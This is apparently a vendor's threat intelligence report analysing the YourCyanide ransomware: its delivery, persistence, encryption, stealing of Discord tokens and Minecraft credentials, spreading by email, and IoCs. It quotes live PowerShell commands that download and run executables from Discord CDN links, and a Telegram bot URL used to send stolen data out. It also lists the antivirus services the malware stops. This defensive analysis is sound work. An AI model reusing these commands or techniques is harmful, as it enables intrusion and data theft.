YourCyanide: An Investigation into ‘The Frankenstein’ Ransomware that Sends Malware Laced Love Letters

YourCyanide: An Investigation into ‘The Frankenstein’ Ransomware that Sends Malware Laced Love Letters

Authors: Anandeshwar Unnikrishnan, Rishika Desai, Benila Susan Jacob

Executive Summary

CloudSEK’s contextual AI digital risk monitoring platform XVigil came across CMD-based Ransomware strain YourCyanide being exploited in the wild. YourCyanide uses Discord, Microsoft Office and Pastebin as part of its payload download mechanism by making Discord attachments and URL requests.

An analysis into the impacts of the ransomware reveals that it can be utilized to compromise confidential business details, practices and IP. There is also a potential risk of takeover or shutdown of company operations resulting in loss of revenue and reputation.

The mitigation measures consist of auditing and monitoring logs of events and incidents to identify unusual patterns and behaviour. There has to be a systematic mechanism of enforcing data protection, back and recovery. Additionally security configurations on network infrastructure devices like firewall and routers have to be implemented.

Analysis and Attribution of YourCynaide

CloudSEK’s Threat Research team has conducted an investigation into the new and sophisticated ‘YourCyanide’ ransomware, which is being exploited in the wild.

This CMD-based ransomware strain is distributed primarily as a Discord attachment and makes URL requests to Microsoft Office and Pastebin. Researchers at Trend Micro discovered that the roots of YourCyanide can be traced back to the GonnaCope ransomware family that first surfaced in April, 2022.

The ransom note is dumped by the malware into “YcynNote.txt”
The ransom note is dumped by the malware into “YcynNote.txt”

 

Features of the Malware

CloudSEK’s Threat Research team discovered the following features of YourCyanide ransomware and its operators:

  • The ransomware execution file is delivered as a Discord attachment as shown below:
Ransomware delivery: (new-object net.webclient).downloadfile(“https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe”, “GetToken.exe”)

Ransomware delivery: (new-object net.webclient).downloadfile(“https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe”, “NoKeyB.exe”)

  • The obfuscated file of YourCyanide, when deobfuscated fetches the executable GetToken.exe.
  • The ransomware encrypts files and renames them with a .cyn extension.
  • The .cmd file of YourCyanide module is dropped by another malicious file CaffeJuice.exe.
  • The ransom note path is C:\Users\Admin\Desktop\YcynNote.txt.
  • YourCyanide ransomware note
    YourCyanide ransomware note

     

  • The threat actor shares their name, BTC wallet address, contact channel and number of files encrypted in the ransom note.
  • The ransomware group usually demands USD 500 from their victims to restore their files.

Association with APT/ Other ransomware groups

  • The YourCyanide sample available, indicates that it could be a variant of the Kekpop ransomware (also known as Kekware); the ransomware drops an ‘other.txt’ file that mentions Kekpop. Our research also confirms that the same Get.exe executable is used to deliver Kekpop and YourCyanide ransomware.
One of the files that get dropped during YourCyanide ransomware attack
One of the files that get dropped during YourCyanide ransomware attack

 

  • Another similarity that links Kekpop and YourCyanide is the ‘black.bat’ file that is dropped in both instances.

Technical Analysis of the YourCyanide Ransomware

Initial Execution

Flowchart of the attack
Flowchart of the attack

A malicious LNK file “powershell.exe.lnk” executes a Powershell command that retrieves the executable “YourCyanide.exe” from the Discord server, and executes it on the victim system to launch YourCyanide ransomware.

Powershell.exe image
Powershell.exe image

 

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command “(New-Object Net.WebClient).DownloadFile(‘https://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe’, ‘YourCyanide.exe’)”; start YourCyanide.exe

Delivery Mechanism – Dropper

The malicious binary YourCyanide.exe, downloaded by the LNK file, acts as a ransomware dropper. It performs the following operations on the system:

  • YourCyanide.exe creates a new directory “IXP000.TMP” in the user’s Temp directory.
  • It dumps YourCyanide.cmd into the newly created directory. The contents of the file are shown in the following image.
  • The dropper executes the batch script to fetch contents from Pastebin and saves it as YourCyanide.cmd, which is the actual ransomware written in batch script.
Contents of the file
Contents of the file

 

  • Before exiting, the dropper deletes the dropped file and the directory in Temp.

Persistence

  • The main ransomware code fetched from Pastebin is heavily obfuscated with multiple layers of string substitutions and slicing, to hinder its analysis or detection.
Ransomware code
Ransomware code

 

  • A further analysis of the deobfuscated code shows that the batch program sets its system and hidden attributes as shown below:
Image of the batch program
Image of the batch program

 

  • The hidden attribute, when set, hides the corresponding file from the user, while the system attribute deceives the operating system to treat the file as crucial. Thus, at the event of alteration or deletion, such files remain unaffected similar to system files.
  • The malware achieves persistence through the following AutoStart Extensibility Points:
    • Run Registry Key
    • Startup Folder

Encryption Process

  • The malware creates a new value “rundll32_474_toolbar” under Run Key in the registry and provides the name of the malicious batch file as data for the new registry entry. Finally, a copy of the malware is saved in the Startup folder. Once the malware achieves persistence, it creates a new batch file “AuToexEc.BAT” in the C:\ drive.
  • The BAT file consists of the command to start a new process of the same malware copy. Later the Task Manager is disabled through the registry. All of these operations are shown in the image below.
Task manager disabled
Task manager disabled

 

  • The malware also checks for the existence of AUTOEXEC.BAT on the victim system. And if found, it is replaced with itself as shown below. In the older DOS system AUTOEXEC.BAT was used as an auto execution mechanism, post the system boot.
Autoexec.bat
Autoexec.bat

 

  • Additionally, the ransomware checks for the analysis environment by verifying the username. These usernames are all taken from popular sandboxes on the internet. The malware exits the system if the username matches any of the usernames mentioned in the code below.
Username matching
Username matching

 

  • A file named “black.bat” is dropped in the user’s Documents directory. The contents are dynamically written into the dropped batch as shown below. The dropped batch file executes a black screensaver by calling the scrnsave.scr file. The execution of the file causes the user’s screen to go blank.
Black.bat
Black.bat

 

Target Services

The malware terminates the following services on the target system:

Services Targeted
  • WinDefend
  • Wuauserv
  • Norton AntiVirus Firewall Monitor Service
  • McAfee SecurityCenter Update Manager
  • crmonsvc
  • ccSetMGR
  • Symantec Network Drivers Service
  • MpfService
  • helpsvc
  • *Symantec*
  • Symantec Core LC
  • Norton AntiVirus Auto Protect Service
  • Norton AntiVirus Server
  • McShield
  • InoRT
  • Norton AntiVirus Client
  • PC-cillin Personal Firewall
  • McAfee.com VirusScan Online Realtime Engine
  • Sophos Anti-Virus
  • eTrust Antivirus Realtime Server
  • net stop netsvcs
  • Security center
  • Automatic Updates
  • McAfee Spamkiller Server
  • Symantec SPBBCSvc
  • MonSvcNT
  • ccEvtMGR
  • Norton Unerase Protection
  • mcupdmgr.exe
  • ERSvc
  • *McAfee*
  • navapsvc
  • Norton AntiVirus Client
  • NAV Alert
  • DefWatch
  • InoTask
  • norton AntiVirus Corporate Edition
  • Trend Micro Proxy Service
  • SyGateService
  • Sophos Anti-Virus Network
  • Sygate Personal Firewall Pro
  • Spoolnt
  • Symantec Core LC
  • SAVScan
  • McAfee Personal Firewall Service
  • Ahnlab Task Scheduler
  • NProtectService
  • srservice
  • MskService
  • McAfeeAntiSpyware
  • *norton*
  • ccPwdSvc
  • Serv-U
  • Symantec AntiVirus Client
  • Nav Auto-Protect
  • eventlog
  • norton AntiVirus Auto Protect Service
  • ViRobot Professional Monitoring
  • McAfee.com McShield
  • Sygate Personal Firewall Pro
  • eTrust Antivirus Job Server
  • eTrust Antivirus RPC Server

Tasks

The malware terminates the following running processes on the system:

Running Processes Targeted
  • MSASCui.exe
  • Excel
  • Msaccess
  • Outlook
  • Fiirefox
  • Iexplore
  • ITunes
  • Safari
  • tskill WINWORD
  • LimreWire
  • Msnmsgr
  • Calc
  • Mspaint
  • Msnmsgr

Data Manipulation

After terminating various protective services and running tasks, the malware locks the data on the target system as shown below. The following directories and its sub directories are traversed to perform locking:

  • Desktop
  • Documents
  • Music
  • Pictures
  • Videos
  • Downloads
Locking of data on target systems
Locking of data on target systems

 

The files are renamed to a random number obtained from multiplying random numbers, followed by which an extension of “cyn” is appended. Once the files are renamed, random data is written to the user file.

The malware drops another batch file named “2b2crypt.cmd” to lock Minecraft related data as shown below. The logic used for locking is the same as seen before. The “.minecraft” and “.minecraft\mods” directories are targeted by the malware as shown below. After writing the contents of the batch file, it is executed to initiate locking of the data.

2b2crypt.cmd for minecraft related data
2b2crypt.cmd for minecraft related data

 

The Logger Script

  • Using Powershell, the malware retrieves another batch file “ycynlog.cmd” and executes it on the target system.
Ycynlog.cmd batch file executed
Ycynlog.cmd batch file executed

 

  • The “ycynlog.cmd” is heavily obfuscated with the same logic used for the main ransomware batch file. The batch instructions hosted on Pastebin are shown below. This malicious script acts as a user data logger and sends the data to a Telegram bot (https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538).
Image of Operations
Image of Operations

 

  • The ycynlog.cmd script just like the main ransomware script initiates the execution by setting Run registry keys to achieve persistence on the target system and also drops the ycynlog.cmd file in the Startup folder.
  • The logger script downloads an additional executable file hosted on Discord CDN and executes it on the system.

GetToken Binary

  • GetToken is a C#/ .NET program used to steal users’ Discord tokens. The stealer contains hard coded directory paths to Discord and various web browser’s local storage as shown in the image below.
GetToken Image
GetToken Image

 

  • The tokens are identified by using Regex pattern matching as shown below. If a match is found, the stealer checks the validity of the token by calling the function TokenUtil.checkToken.
tokenutil.check token operations
tokenutil.check token operations

 

  • The token validity is performed by connecting to the Discord server and monitoring the server response. The token checking routine is shown below. The valid tokens are returned to the caller function.
Token checking routine
Token checking routine
  • The stealer creates a file Tokens.txt on the victim system and dumps all valid tokens found. If there are no tokens present, the value that gets written into Tokens.txt is “Retard Has No tokens.” The ransomware finally sends the Token.txt to the Telegram bot.
Image of Operations
Image of Operations

 

  • The global IP address of the victim is retrieved by sending a request to https://ipv4.wtfismyip.com/text through curl and the output is stored as IP.txt.
  • The script retrieves a list of installed applications on the system and stores it in apps.txt to later send it to the Telegram bot.
  • WMI is used extensively to retrieve system level information from the user. The following list summarizes the data enumerated by the script:
    • Username
    • IP address (local)
    • Network configuration data
    • MAC information
    • CPU data
    • Physical memory data
    • Disk information like partition details
    • Windows system information
    • Windows license information (Product Key)
  • The above data along with Tokens.txt generated by GetToken.exe are sent to the Telegram bot. Additionally, the logger scripts steal the following Minecraft specific user data:
Image of Operations
Image of Operations

 

    • Launcher_msa_credentials.bin
    • Launcher_msa_credentials_microsoft_store.bin
    • Launcher_accounts.json
    • Launcher_accounts_microsoft_store.json
    • Launcher_product_state.json
    • launcher_profiles.json
  • Using Powershell the logger script downloads ForMe.txt from Google Cloud and executes it on the system.
Image of Operations
Image of Operations

 

  • The ForMe.exe dumps data into ForMe.txt which is later pushed to the Telegram bot. Unfortunately, at the time of our analysis the Google Cloud link did not serve the file. Our research indicates that it could be a browser password stealer.
  • The ransomware script then drops a batch file named “fuckports.cmd.” Instructions to add custom firewall rules are written into the batch file as shown below. The following firewall rules allow inbound UDP traffic to port 2835 and outbound UDP traffic through 16981.
Fuckports.cmd batch file dropped
Fuckports.cmd batch file dropped

 

  • The malware adds itself into the win.ini and system.ini files. These files contain configuration files to start up programs and other settings after a system boot. The malware drops two batch files, “confession.bat” and “Check This Out.bat,” that have identical purposes.
confession.bat
confession.bat

 

checkthisout.bat
checkthisout.bat

 

  • YourCyanide is also capable of spreading via mail. It utilizes Visual Basic APIs to communicate with Microsoft Outlook and sends out a copy of itself as mail attachment. The malware then drops “loveletter.vbs” in the Documents directory.
  • The VB script retrieves the user’s address list and sends out an email with the subject “I have a crush on you” and a message that states “read me.” The mail attachment contains a copy of the ransomware batch program.
Love letter
Love letter

 

Ransom Collection

  • The malware drops an additional vbs file named “mail.vbs” with the same contents as mentioned above. However, it will send an email with the subject line “Check This Out.”
Check this out
Check this out

 

  • The ransomware uses the Powershell Out-Printer commandlet to print out multiple copies of the ransom note.
Ransom note
Ransom note

 

  • The malware also copies itself to other drives present on the system as shown below:
Copying itself to other drives
Copying itself to other drives

 

  • Notably, YouCyanide changes the file association of vbs, sln, js, css, and ini. Upon opening such files, the system transfers their control to an associated program. The malware associates listed file types with itself. The malware is executed when similar file types are opened.
List of associated files
List of associated files

 

  • The malware enables remote desktop on the target system as shown below and starts the TermService or terminal service which is responsible for handling RDP related tasks.
Terminal service
Terminal service

 

  • Finally the ransom note is displayed to the user and creates an autorun configuration for available drives on the system that leads to execution of the malware itself as shown below.

Impact & Mitigation

Impact Mitigation
  • Stolen credentials could allow access to the organization’s networks.
  • Exposed Personally Identifiable Information (PII) could be used to orchestrate social engineering schemes, phishing attacks, and even identity theft.
  • Exposed credentials could be leveraged to access users’ other accounts, owing to password reuse.
  • Exposed data could reveal business practices and intellectual property.
  • Use proactive threat intelligence to prevent and alert users of potential threats and to strengthen external security posture.
  • Reset compromised login credentials and implement a strong password policy for user accounts.
  • Use MFA (multi-factor authentication) across logins.
  • Check for possible workarounds and patch all vulnerable and exploitable endpoints while keeping ports open.
  • Monitor for anomalies that could be indicators of possible takeovers.

Indicators of Compromise (IoCs)

SHA256
  • 9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe
  • c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50
  • 6A645F72ACF1D6C906E8C844E4E8B3FC92C411BF69937CFE7069DF2CC51B8A4E
  • 6AD08FE301CAAE18941487412E96CEB0B561DE4482DA25EA4BB8EEB6C1A40983
  • 6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91
  • f8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323
  • 8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402
  • 67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf
  • a3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c
  • 0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2
  • 298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c
  • 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85
URL
  • https://pastebin.com/raw/2K5m42Xp
  • https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
  • https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
  • https://ipv4.wtfismyip.com/text
  • https://doc-0k-0k-docs.googleusercontent.com/docs/securesc/hg4h2398q99ghdi837vesvkmkv3nlr6u/ai385da1543uhdsi9bioneodrj6ljsd0/1652563275000/10334864966473916138/10334864966473916138/1qubjLFibSRfpNaX8z2SkwfHMiaQGKkn5?e=download&ax=ACxEAsayVkeHdNE6Rd2bptmdqZSTVYKwRPoiFNDJuQVnig_FKMx1vCzDipGZR7IOdO-2g1gOL15FljJPButVcD1jYwAdz9PxfiRxRrf-IXEkxwIn-KYy0NfynS5Us2LkVa8lUVIgCh3AETDK76rTtUf2Yv77eLHmSWmY57tXc_sPH9QpvJSYgJ_RdbREqd4SAbnWHFihxQMttNZe7vjevvlVc0nAwXWhmoXnCdTJpoN0OOQbhl8PmoHcm03iAReIe_KnHS9uuidU_VxCPtmQU97uGRj-XxZFqfTRF5kFTSf7YukXosSBxivgSZbaXMD0fWkmh1Gw51Waxqfc5G0I_hQpGMF3xzwIvB2FmHyN-A2nefhWVQAuoPcqNyNXOQq2UULaGDCqjYX4X_ehWRSCMfdDl7tZs9U2E-cqfI
Domain
  • Pastebin
  • Wtfismyip
  • Discordapp
  • Telegram

References

 

CloudSEK Threat Intelligence
CloudSEK’s Threat Intelligence team, a group of cybersecurity experts led by Koushik Sivaraman, primarily focuses on the research and analysis of threat intelligence related to threat actors, malware, vulnerability/ exploitation, data breach incidents, etc.
This is Alt
Threat Intelligence Researcher, CloudSEK
Total Posts: 19
Anandeshwar is a Threat Intelligence Researcher at CloudSEK. He is a strong advocate of offensive cybersecurity. He is fuelled by his passion for cyber threats in a global context. He dedicates much of his time on Try Hack Me/ Hack The Box/ Offensive Security Playground. He believes that “a strong mind starts with a strong body.” When he is not gymming, he finds time to nurture his passion for teaching. He also likes to travel and experience new cultures.
Total Posts: 0
Sorry! The Author has not filled his profile.
Total Posts: 0
Sorry! The Author has not filled his profile.
×
CloudSEK Threat Intelligence
CloudSEK’s Threat Intelligence team, a group of cybersecurity experts led by Koushik Sivaraman, primarily focuses on the research and analysis of threat intelligence related to threat actors, malware, vulnerability/ exploitation, data breach incidents, etc.
Latest Posts
  • YourCyanide: An Investigation into ‘The Frankenstein’ Ransomware that Sends Malware Laced Love Letters
  • Eternity Ransomware Group